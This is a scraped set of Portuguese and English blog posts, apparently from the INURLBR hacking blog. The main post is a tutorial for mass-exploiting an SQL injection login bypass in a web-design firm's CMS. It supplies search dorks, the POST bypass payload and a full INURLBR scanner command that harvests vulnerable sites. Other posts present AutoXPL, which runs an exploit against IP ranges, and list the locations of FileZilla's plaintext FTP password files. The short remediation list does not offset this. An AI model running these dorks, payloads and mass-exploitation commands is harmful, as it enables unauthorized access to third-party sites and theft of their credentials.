<li><b><a href="http://rberaldo.com.br/chmod-permissoes-em-sistemas-linux-e-unix-like/" target="_blank">http://rberaldo.com.br/chmod-permissoes-em-sistemas-linux-e-unix-like/</a></b></li>
<li><b><a href="http://www.vivaolinux.com.br/dica/Impedindo-listagem-de-diretorio-no-Apache">http://www.vivaolinux.com.br/dica/Impedindo-listagem-de-diretorio-no-Apache</a></b></li>
<li><a href="http://blog.inurl.com.br/2014/07/explorando-falha-no-zend-framework-full.html" target="_blank">http://blog.inurl.com.br/2014/07/explorando-falha-no-zend-framework-full.html</a></li>
</b></span></ol>
<span style="font-family: Courier New, Courier, monospace;"><b>
</b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b><br /></b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b><br /></b></span></div>
</div>
</div>
InurlBRhttp://www.blogger.com/profile/12688503833321390298noreply@blogger.com9tag:blogger.com,1999:blog-5670232360751087799.post-32574644952155549372015-08-20T01:38:00.001-03:002015-08-20T01:41:11.716-03:00Scanner INURLBR explorando via post(<i>Bom dia, Boa tarde, Boa noite</i>) rsrsrs, Quem vos escreve é <b>googleINURL</b> venho trazer uma forma diferente de exploração com scanner <b><a href="http://blog.inurl.com.br/search/label/INURLBR" target="_blank">INURLBR</a></b> usando request <b>POST</b>.<br />
<div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioGPU3ybHGDtylQ48CdT6O22XWJgU0xoN26C_MBHPF66eCvLZk9Vi73PtaWNPf_O6z-DWkeHT-CkSSbLk9oclMn-OeDdX-5L5bEgOJzHTtixLKzrK5EbbDyuiQ1sQB6lpW-SMe8JfB82oo/s1600/Figure01.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Quem vos escreve é googleINURL venho trazer uma forma diferente de exploração com scanner INURLBR usando request POST. Até o momento a grande utilização do scanner é feito por meio de exploração via GET e validando valores de retorno, faremos o mesmo porem com comando voltados pro resquest POST. Para tal tutorial vamos usar um exploit publicado no Exploit4arab Exploit: http://www.exploit4arab.net/exploits/1741 - Exploit Author : GeNeRaL O XPL trata-se de explorar um falha SQLI do painel de acesso administrativo do site, CMS feito pela empresa Shafferwebdesign." border="0" height="316" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioGPU3ybHGDtylQ48CdT6O22XWJgU0xoN26C_MBHPF66eCvLZk9Vi73PtaWNPf_O6z-DWkeHT-CkSSbLk9oclMn-OeDdX-5L5bEgOJzHTtixLKzrK5EbbDyuiQ1sQB6lpW-SMe8JfB82oo/s640/Figure01.png" title="Quem vos escreve é googleINURL venho trazer uma forma diferente de exploração com scanner INURLBR usando request POST. Até o momento a grande utilização do scanner é feito por meio de exploração via GET e validando valores de retorno, faremos o mesmo porem com comando voltados pro resquest POST. Para tal tutorial vamos usar um exploit publicado no Exploit4arab Exploit: http://www.exploit4arab.net/exploits/1741 - Exploit Author : GeNeRaL O XPL trata-se de explorar um falha SQLI do painel de acesso administrativo do site, CMS feito pela empresa Shafferwebdesign." width="640" /></a></div>
<br />
<br /></div>
<div>
Até o momento a grande utilização do scanner é feito por meio de exploração via <b>GET</b> e validando valores de retorno, faremos o mesmo porem com comando voltados pro <b>resquest</b> POST.</div>
<div>
<br /></div>
<div>
Para tal tutorial vamos usar um exploit publicado no <a href="http://www.exploit4arab.net/" target="_blank">Exploit4arab</a></div>
<div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>Exploit:</b></span></div>
<div>
<a href="http://www.exploit4arab.net/exploits/1741" target="_blank">http://www.exploit4arab.net/exploits/1741</a> - <span style="font-family: Courier New, Courier, monospace;">Exploit Author : GeNeRaL</span></div>
<div>
Affected Webs/Versions : All<br />
<br /></div>
<div>
O XPL trata-se de explorar um falha <a href="http://blog.inurl.com.br/search/label/sqli" target="_blank">SQLI</a> do painel de acesso administrativo do site, <b>CMS</b> feito pela empresa <a href="http://www.shafferwebdesign.com/" target="_blank">Shafferwebdesign</a>.<br />
<br />
Dork:</div>
<div>
intext:"by Shaffer Web Design" ext:php</div>
<div>
intext:"Designed by Shaffer Web Design" </div>
<div>
intext:"Website Development provided by Shaffer Web Design"</div>
<div>
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>Acesso: </b></span><br />
<span style="font-family: 'Courier New', Courier, monospace;">http://www.xx.com<span style="color: red;">/admin.php</span></span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>POC:</b></span><br />
Request POST</div>
<div>
<span style="font-family: Courier New, Courier, monospace;">http://www.xx.com<span style="color: red;">/login.php?email=<b>'=' 'OR'</b>&password=<b>'=' 'OR'</b>&from_page=http://www.xx.us/&Submit_Login=Login to My Account</span></span></div>
<div>
<br />
Campos explorados com um simples Bypass:<br />
<span style="color: red; font-family: 'Courier New', Courier, monospace;">email=</span><b style="color: red; font-family: 'Courier New', Courier, monospace;"><i>'=' 'OR'</i></b></div>
<div>
<span style="color: red; font-family: 'Courier New', Courier, monospace;">password=</span><b style="color: red; font-family: 'Courier New', Courier, monospace;"><i>'=' 'OR'</i></b></div>
<div>
<br /></div>
<div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>Debug request:</b></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTQv0LtNWBjNrfXqyBjJ421Re0EcANnQWjgQWJdFGpZfgf9P1ih5DwIIce1zhDeUjpr481N77V9FOis5wdPLWLsiPYz1DL0leP5aOD-RzitZo2TebwXTc4gNPyMIbfpKcE1RXLrl3HMWSv/s1600/Captura+de+tela+de+2015-08-20+00%253A16%253A31.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="POC: Request POST http://www.xx.com/login.php?email='=' 'OR'&password='=' 'OR'&from_page=http://www.xx.us/&Submit_Login=Login to My Account Campos explorados com um simples Bypass: email='=' 'OR' password='=' 'OR' Debug request:" border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTQv0LtNWBjNrfXqyBjJ421Re0EcANnQWjgQWJdFGpZfgf9P1ih5DwIIce1zhDeUjpr481N77V9FOis5wdPLWLsiPYz1DL0leP5aOD-RzitZo2TebwXTc4gNPyMIbfpKcE1RXLrl3HMWSv/s640/Captura+de+tela+de+2015-08-20+00%253A16%253A31.png" title="POC: Request POST http://www.xx.com/login.php?email='=' 'OR'&password='=' 'OR'&from_page=http://www.xx.us/&Submit_Login=Login to My Account Campos explorados com um simples Bypass: email='=' 'OR' password='=' 'OR' Debug request:" width="640" /></a></div>
<div>
<br />
<ul>
<li>1 - Enviamos o request <b>Bypass</b> para o arquivo <b>login.php</b></li>
<li>2 - O servidor aceita o request e retorna código 302 http de redirecionamento.</li>
<li>3 - Somos redirecionados para pagina <b>my_account.php</b> do servidor.</li>
</ul>
<div>
Agora vamos montar comando para exploração via INURLBR.<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;">Download:</span></div>
</div>
<div>
<a href="https://github.com/googleinurl/SCANNER-INURLBR">https://github.com/googleinurl/SCANNER-INURLBR</a></div>
<div>
<br /></div>
<div>
Comando:</div>
<div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>- Setar DORK de pesquisa:</b></span><br />
Exemplo:</div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b>--dork</b> Defines which dork the search engine will use.</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> Example: <span style="color: red;"><b>--dork</b> {dork}</span></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> Usage: <span style="color: red;"><b>--dork</b> <b>'</b>site:.gov.br inurl:php? id<b>'</b></span></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> - Using multiples dorks:</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> Example: <span style="color: red;"><b>--dork</b> {[DORK]dork1[DORK]dork2[DORK]dork3}</span></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> Usage: <span style="color: red;"><b>--dork</b> <b>'</b>[DORK]site:br[DORK]site:ar inurl:php[DORK]site:il inurl:asp<b>'</b></span></span></div>
</div>
<div>
<br /></div>
<div>
Usando para exploração atual:</div>
<div>
<span style="color: red; font-family: Courier New, Courier, monospace;"><b>--dork '</b>intext:"by Shaffer Web Design" ext:php<b>'</b></span><br />
<span style="color: red; font-family: Courier New, Courier, monospace;"><b><br /></b></span></div>
<div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>- Setar OUTPUT:</b></span></div>
<div>
Exemplo:</div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b>-s</b> Specify the output file where it will be saved the vulnerable URLs.</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> Example: <span style="color: red;"><b>-s</b> {file}</span></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> Usage: <span style="color: red;"><b>-s</b> your_file.txt</span></span></div>
</div>
<div>
<br /></div>
<div>
Usando para exploração atual:</div>
<div>
<span style="color: red; font-family: Courier New, Courier, monospace;"><b>-s</b> tutorial.txt</span></div>
<div>
<br /></div>
<div>
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">- Setar </span></b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>ifredirect </b></span><b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">validação da URL redirecionamento:</span></b></div>
<div>
Exemplo:</div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b> --ifredirect</b> Return validation method post REDIRECT_URL</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> Example: <span style="color: red;"><b>--ifredirect</b> {string_validation}</span></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> Usage: <span style="color: red;"><b>--ifredirect '</b>/admin/painel.php<b>'</b></span></span></div>
</div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span style="color: red;"><b><br /></b></span></span></div>
<div>
Usando para exploração atual:</div>
<div>
<b style="color: red; font-family: 'Courier New', Courier, monospace;">--</b><span style="color: red; font-family: Courier New, Courier, monospace;"><b>ifredirect</b></span><span style="color: red; font-family: 'Courier New', Courier, monospace;"> </span><span style="color: red; font-family: Courier New, Courier, monospace;">'my_account.php'</span></div>
<div>
<span style="color: red; font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">- Setar string</span></b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b> que será concatenada junto ao host, para isso usamos o exploit-get:</b></span></div>
<div>
Exemplo:</div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> <b>--exploit-get</b> Defines which exploit will be injected through the GET method to each URL found.</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> Example: <span style="color: red;"><b>--exploit-get</b> {exploit_get}</span></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> Usage: <span style="color: red;"><b>--exploit-get "</b>?'´%270x27;<b>"</b></span></span></div>
</div>
<div>
<br /></div>
<div>
<div>
Usando para exploração atual:</div>
<div>
<span style="color: red; font-family: Courier New, Courier, monospace;"><b>--exploit-get</b></span><span style="color: red; font-family: 'Courier New', Courier, monospace;"> </span><span style="color: red; font-family: Courier New, Courier, monospace;">'/login.php'</span></div>
</div>
<div>
Ai fica a pergunta, mas por quê ? eu uso exploit-get em algo que é explorado via post ?<br />
R: <i>O comando exploit-get do script inurlbr é tratado mais como um concatenador de string adicionado no final de cada alvo depois executado, por esse motivo é possível usar ele sem altera o Request total.</i><br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">- Setar request Bypass POST</span></b><br />
Exemplo:<br />
<span style="font-family: Courier New, Courier, monospace;"><b> --exploit-post</b> Defines which exploit will be injected through the POST method to each URL found.</span><br />
<span style="font-family: Courier New, Courier, monospace;"> Example: <span style="color: red;"><b>--exploit-post</b> {exploit_post}</span></span><br />
<span style="font-family: Courier New, Courier, monospace;"> Usage: <span style="color: red;"><b>--exploit-post</b> 'field1=valor1&field2=valor2&field3=?´0x273exploit;&botao=ok'</span></span><br />
<div>
<br /></div>
Usando para exploração atual:<br />
<span style="color: red; font-family: Courier New, Courier, monospace;"><b>--exploit-post</b> "email='=' 'OR'&password='=' 'OR'&from_page=http://www.theultimaterose.com/&Submit_Login=Login to My Account"</span><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>Comando completo:</b></span><br />
<span style="color: red; font-family: Courier New, Courier, monospace;">php inurlbr.php </span><b style="color: red; font-family: 'Courier New', Courier, monospace;">--dork '</b><span style="color: red; font-family: 'Courier New', Courier, monospace;">intext:"by Shaffer Web Design" ext:php</span><b style="color: red; font-family: 'Courier New', Courier, monospace;">'</b><span style="color: red; font-family: Courier New, Courier, monospace;"> <b>-s</b> tutorial.txt <b>--ifredirect</b> <b>'</b>my_account.php<b>'</b> <b>--exploit-get</b> <b>'</b>/login.php<b>'</b> <b>--exploit-post</b> <b>"</b>email='=' 'OR'&password='=' 'OR'&from_page=http://www.xx.com/&Submit_Login=Login to My Account<b>"</b></span><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>Exemplo de Saída vulnerável:</b></span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEha9Ytwq4a0J34dhY4aONsvK7fGsj7yq6chsH2LcLMtqF04LWMyuy1-VcHFJWfVAeRglHyD0PtEAKigl5emBb3ZLosym1V4qxrmIxyMrRcNwxkFNeCho3ksyvDzU82WZ8467V1yrPY0EXje/s1600/Captura+de+tela+de+2015-08-19+23%253A33%253A37.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Comando completo: php inurlbr.php --dork 'intext:"by Shaffer Web Design" ext:php' -s tutorial.txt --ifredirect 'my_account.php' --exploit-get '/login.php' --exploit-post "email='=' 'OR'&password='=' 'OR'&from_page=http://www.xx.com/&Submit_Login=Login to My Account" Exemplo de Saída vulnerável:" border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEha9Ytwq4a0J34dhY4aONsvK7fGsj7yq6chsH2LcLMtqF04LWMyuy1-VcHFJWfVAeRglHyD0PtEAKigl5emBb3ZLosym1V4qxrmIxyMrRcNwxkFNeCho3ksyvDzU82WZ8467V1yrPY0EXje/s640/Captura+de+tela+de+2015-08-19+23%253A33%253A37.png" title="Comando completo: php inurlbr.php --dork 'intext:"by Shaffer Web Design" ext:php' -s tutorial.txt --ifredirect 'my_account.php' --exploit-get '/login.php' --exploit-post "email='=' 'OR'&password='=' 'OR'&from_page=http://www.xx.com/&Submit_Login=Login to My Account" Exemplo de Saída vulnerável:" width="640" /></a></div>
OBS: <i>Exemplo do print usei comando -o para abrir um arquivo com alvo.</i><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>Solução ?</b></span><br />
<br />
<ol>
<li>Sempre filtre o que vem do cliente.</li>
<li>Não confie em dados que vem do cliente.</li>
<li>Filtre todo request seja get ou post $_REQUEST.</li>
<li>Use PDO sem moderação Prepared Statements é o poder.</li>
<li>Use filtros nativos do PHP filter_var</li>
</ol>
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Referencia para soluções e estudos:</span></b><br />
<a href="http://php.net/manual/pt_BR/security.database.sql-injection.php" target="_blank">http://php.net/manual/pt_BR/security.database.sql-injection.php</a><br />
<a href="https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005)" target="_blank">https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005)</a><br />
<a href="http://php.net/manual/en/pdo.prepared-statements.php" target="_blank">http://php.net/manual/en/pdo.prepared-statements.php</a><br />
<a href="http://us3.php.net/manual/en/filter.filters.validate.php" target="_blank">http://us3.php.net/manual/en/filter.filters.validate.php</a><br />
<a href="https://www.owasp.org/images/5/57/OWASP-AppSecEU08-Janot.pdf" target="_blank">https://www.owasp.org/images/5/57/OWASP-AppSecEU08-Janot.pdf</a></div>
InurlBRhttp://www.blogger.com/profile/12688503833321390298noreply@blogger.com8tag:blogger.com,1999:blog-5670232360751087799.post-16707108889992877102015-08-18T22:08:00.000-03:002015-11-19T21:37:49.910-02:00AutoXPL - Executando comandos em massa<div style="text-align: center;">
"T0" c0m mu1ta pr3guiça de faz3r um post na língu4 d0s gringo, v41 ser em PT-BR m3smo.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Venho trazer um script que vem a muito tempo quebrando meu galho quando se trata de exploração em massa, na questão motor, mas o que seria "motor" ?<br />
Motor refiro-me quando temos um script que pode trazer alvos seja de um arquivo,banco de dados ou gerando dinamicamente.</div>
<div style="text-align: left;">
É justamente isso que AutoXPL faz, ele executa outros exploits de forma massiva.<br />
Suponhamos que você tenha um script básico que explora uma determinada falha SQLI de um server<br />
onde você precisa passar via parâmetro o alvo e só, ele explora 1 para 1.<br />
<br /></div>
<div style="text-align: left;">
<pre> [+] AUTOR: googleINURL
[+] EMAIL: inurlbr@gmail.com
[+] Blog: http://blog.inurl.com.br
[+] Twitter: https://twitter.com/googleinurl
[+] Fanpage: https://fb.com/InurlBrasil
[+] Pastebin http://pastebin.com/u/Googleinurl
[+] GIT: https://github.com/googleinurl
[+] PSS: http://packetstormsecurity.com/user/googleinurl
[+] YOUTUBE: http://youtube.com/c/INURLBrasil
[+] PLUS: http://google.com/+INURLBrasil</pre>
<br />
<br />
Vamos usar um exemplo simples de ping um script dispara um ping contra o host</div>
<div style="text-align: left;">
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif; font-size: large;"><b>Exemplo de script 1 para 1:</b></span></div>
<div style="text-align: left;">
<span style="color: red; font-family: "courier new" , "courier" , monospace;">./xpl.sh 'www.google.com.br'</span></div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSEqJpN-JsSHg3BIfmGojmfWUKNw8m9wCfVqOsEY_QQ3BE3cH-iuSqbFZ28yuDaR9cGTqK9s2MorL34B8VgYSEB7OVeO32Vhpgv8ZNznFPHVT8xKe_gQslVTDQvRFfY5v7VnCOEjC5D65T/s1600/ping.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt=" Vamos usar um exemplo simples de ping um script dispara um ping contra o host Exemplo de script 1 para 1: ./xpl.sh 'www.google.com.br'" border="0" height="116" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSEqJpN-JsSHg3BIfmGojmfWUKNw8m9wCfVqOsEY_QQ3BE3cH-iuSqbFZ28yuDaR9cGTqK9s2MorL34B8VgYSEB7OVeO32Vhpgv8ZNznFPHVT8xKe_gQslVTDQvRFfY5v7VnCOEjC5D65T/s640/ping.png" title=" Vamos usar um exemplo simples de ping um script dispara um ping contra o host Exemplo de script 1 para 1: ./xpl.sh 'www.google.com.br'" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Agora vamos executar via AutoXPL:</div>
<div class="separator" style="clear: both; text-align: left;">
<b><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif; font-size: large;">DOWNLOAD:</span></b></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://github.com/googleinurl/AutoXPL">https://github.com/googleinurl/AutoXPL</a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif; font-size: large;"><b>MENU:</b></span><br />
<pre><span style="color: red;"> -t : SET TARGET.
-f : SET FILE TARGETS.
--range : SET RANGE IP.
--range-rand : SET NUMBE IP RANDOM.
--xpl : SET COMMAND XPL.
Execute:
php autoxpl.php -t target --xpl './xpl _TARGET_'
php autoxpl.php -f targets.txt --xpl './xpl _TARGET_'
php autoxpl.php --range '200.1.10.1,200.1.10.255' --xpl './xpl _TARGET_'
php autoxpl.php --range-rand 20 --xpl './xpl _TARGET_'</span>
</pre>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b style="font-size: x-large;"><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Exemplo de script AutoXPL para varios:</span></b></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: red; font-family: "courier new" , "courier" , monospace;">php autoxpl.php <b>-f</b> targets.txt <b>--xpl</b> './xpl.sh _TARGET_'</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: red; font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="text-align: left;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWZj2FXB2nDot5Gv_h-U1QQ7mwpSVmfKJm10DXCspAtIxYCANCff7KAfvUd1X542CbGH5842d_5wPIgDWi0MdD_Dn6zDa-7jQ0vZ5yXR7lyaEu8HTw4fVxQlh-evIzHdBqVmeYQNmwD4La/s1600/Captura+de+tela+de+2015-08-18+22%253A03%253A26.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Agora vamos executar via AutoXPL: DOWNLOAD: https://github.com/googleinurl/AutoXPL MENU: -t : SET TARGET. -f : SET FILE TARGETS. --range : SET RANGE IP. --range-rand : SET NUMBE IP RANDOM. --xpl : SET COMMAND XPL. Execute: php autoxpl.php -t target -xpl './xpl _TARGET_' php autoxpl.php -f targets.txt -xpl './xpl _TARGET_' php autoxpl.php --range '200.1.10.1,200.1.10.255' -xpl './xpl _TARGET_' php autoxpl.php --range-rand 20 -xpl './xpl _TARGET_' Exemplo de script AutoXPL para varios: php autoxpl.php -f targets.txt --xpl './xpl.sh _TARGET_'" border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWZj2FXB2nDot5Gv_h-U1QQ7mwpSVmfKJm10DXCspAtIxYCANCff7KAfvUd1X542CbGH5842d_5wPIgDWi0MdD_Dn6zDa-7jQ0vZ5yXR7lyaEu8HTw4fVxQlh-evIzHdBqVmeYQNmwD4La/s640/Captura+de+tela+de+2015-08-18+22%253A03%253A26.png" title="Agora vamos executar via AutoXPL: DOWNLOAD: https://github.com/googleinurl/AutoXPL MENU: -t : SET TARGET. -f : SET FILE TARGETS. --range : SET RANGE IP. --range-rand : SET NUMBE IP RANDOM. --xpl : SET COMMAND XPL. Execute: php autoxpl.php -t target -xpl './xpl _TARGET_' php autoxpl.php -f targets.txt -xpl './xpl _TARGET_' php autoxpl.php --range '200.1.10.1,200.1.10.255' -xpl './xpl _TARGET_' php autoxpl.php --range-rand 20 -xpl './xpl _TARGET_' Exemplo de script AutoXPL para varios: php autoxpl.php -f targets.txt --xpl './xpl.sh _TARGET_'" width="640" /></a></div>
<br />
O parâmetro <span style="color: red; font-family: "courier new" , "courier" , monospace;">--xpl</span> do script AutoXPL funciona executando um command line, assim possibilita até mesmo aviar um curl, nmap, sqlmap ou seja aquele exploit FTP, pois podemos gerar lista de IPs com o script.<br />
<br />
Exemplo usando range de IP:<br />
<span style="color: red; font-family: "courier new" , "courier" , monospace;">php autoxpl.php <b>--range</b> '200.1.10.1,200.1.10.255' <b>--xpl</b> './xpl.sh _TARGET_'</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoDIvTKXO_ZFImkAZsjkRR-Q0FzY85uvW6rFExUxznPaN64IKduWjCM3Y-PcX-Qs-wXNKyXZw6bXHMIA7RbnCdaw5g2Dc43JpTB3rUNIumJ4Qpf-YJQTdPNnlTJNAasPPOme4z8YQvZVQf/s1600/Captura+de+tela+de+2015-08-18+22%253A06%253A33.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="O parâmetro --xpl do script AutoXPL funciona executando um command line, assim possibilita até mesmo aviar um curl, nmap, sqlmap ou seja aquele exploit FTP, pois podemos gerar lista de IPs com o script. Exemplo usando range de IP: php autoxpl.php --range '200.1.10.1,200.1.10.255' --xpl './xpl.sh _TARGET_'" border="0" height="356" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoDIvTKXO_ZFImkAZsjkRR-Q0FzY85uvW6rFExUxznPaN64IKduWjCM3Y-PcX-Qs-wXNKyXZw6bXHMIA7RbnCdaw5g2Dc43JpTB3rUNIumJ4Qpf-YJQTdPNnlTJNAasPPOme4z8YQvZVQf/s640/Captura+de+tela+de+2015-08-18+22%253A06%253A33.png" title="O parâmetro --xpl do script AutoXPL funciona executando um command line, assim possibilita até mesmo aviar um curl, nmap, sqlmap ou seja aquele exploit FTP, pois podemos gerar lista de IPs com o script. Exemplo usando range de IP: php autoxpl.php --range '200.1.10.1,200.1.10.255' --xpl './xpl.sh _TARGET_'" width="640" /></a></div>
<br />
<div>
<br /></div>
</div>
<div style="text-align: left;">
<br /></div>
InurlBRhttp://www.blogger.com/profile/12688503833321390298noreply@blogger.com4tag:blogger.com,1999:blog-5670232360751087799.post-3117933592866325412015-08-02T23:16:00.003-03:002015-08-02T23:18:43.370-03:00Accessing sensitive data FileZilla<h3 style="text-align: center;">
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">FileZilla FTP <a href="http://blog.inurl.com.br/search/label/password" target="_blank">Passwords</a> now Stored in Plaintext.</span></h3>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisyuhJN1lWHzJeELxvKmxH_975sKTPoXvg_n2W2oXk0cxvsUciOs1_tjYETdwVs0tcM76Ijivmc0vOLOW6xTlkMAxFI_WfKnthQbEWG1y5bgK7F8d2dtBAiDQCwNDTaxLioOjR5145dvyG/s1600/Captura+de+tela+de+2015-08-02+23%253A14%253A43.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="It's an old vulnerability FileZilla, but we can still find servers with such a security breach, Vulnerability allows access to sensitive files from the server. Containing passwords and FTP users. FileZilla version ~ 3.0.9.2+ (and possibly older) store all FTP connection data .xml files in plain text. The following files are what you need to know about: filezilla.xml – Stores most recent server info including password in plaintext. recentservers.xml – Stores all recent server info including password in plaintext. sitemanager.xml – Stores all saved sites server info including password in plaintext. These files can usually be found in the following directories: Windows XP/2K: "C:\Documents and Settings\username\Application Data\FileZilla" Windows Vista: "C:\Users\username\AppData\Roaming\FileZilla\" Linux: "/home/username/.filezilla/" FileZilla configuration files FileZilla is a cross-platform application. That’s why it stores its settings in platform-neutral XML files." border="0" height="356" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisyuhJN1lWHzJeELxvKmxH_975sKTPoXvg_n2W2oXk0cxvsUciOs1_tjYETdwVs0tcM76Ijivmc0vOLOW6xTlkMAxFI_WfKnthQbEWG1y5bgK7F8d2dtBAiDQCwNDTaxLioOjR5145dvyG/s640/Captura+de+tela+de+2015-08-02+23%253A14%253A43.png" title="It's an old vulnerability FileZilla, but we can still find servers with such a security breach, Vulnerability allows access to sensitive files from the server. Containing passwords and FTP users. FileZilla version ~ 3.0.9.2+ (and possibly older) store all FTP connection data .xml files in plain text. The following files are what you need to know about: filezilla.xml – Stores most recent server info including password in plaintext. recentservers.xml – Stores all recent server info including password in plaintext. sitemanager.xml – Stores all saved sites server info including password in plaintext. These files can usually be found in the following directories: Windows XP/2K: "C:\Documents and Settings\username\Application Data\FileZilla" Windows Vista: "C:\Users\username\AppData\Roaming\FileZilla\" Linux: "/home/username/.filezilla/" FileZilla configuration files FileZilla is a cross-platform application. That’s why it stores its settings in platform-neutral XML files." width="640" /></a></div>
<br />
It's an old vulnerability FileZilla, but we can still find servers with such a security breach, <a href="http://blog.inurl.com.br/search/label/vulnerability" target="_blank">Vulnerability</a> allows access to sensitive files from the server. Containing passwords and FTP users.<br />
<br />
FileZilla version ~<b> 3.0.9.2</b>+ (and possibly older) store all <a href="http://blog.inurl.com.br/search/label/ftp" target="_blank">FTP</a> connection data .xml files in plain text.<br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">The following files are what you need to know about:</span></b><br />
<br />
<span style="font-family: Courier New, Courier, monospace;">filezilla.xml</span> – <i>Stores most recent server info including password in plaintext.</i><br />
<span style="font-family: Courier New, Courier, monospace;">recentservers.xml</span> – <i>Stores all recent server info including password in plaintext.</i><br />
<span style="font-family: Courier New, Courier, monospace;">sitemanager.xml</span> – <i>Stores all saved sites server info including password in plaintext.</i><br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">These files can usually be found in the following directories:</span></b><br />
<span style="font-family: Courier New, Courier, monospace;">Windows XP/2K:</span> <i>"C:\Documents and Settings\username\Application Data\FileZilla"</i><br />
<span style="font-family: Courier New, Courier, monospace;">Windows Vista:</span> <i>"C:\Users\username\AppData\Roaming\FileZilla\"</i><br />
<span style="font-family: Courier New, Courier, monospace;">Linux:</span> <i>"/home/username/.filezilla/"</i><br />
<br />
<b>FileZilla configuration files</b><br />
FileZilla is a cross-platform application. That’s why it stores its settings in platform-neutral XML files.<br />
<div class="separator" style="clear: both; text-align: center;">
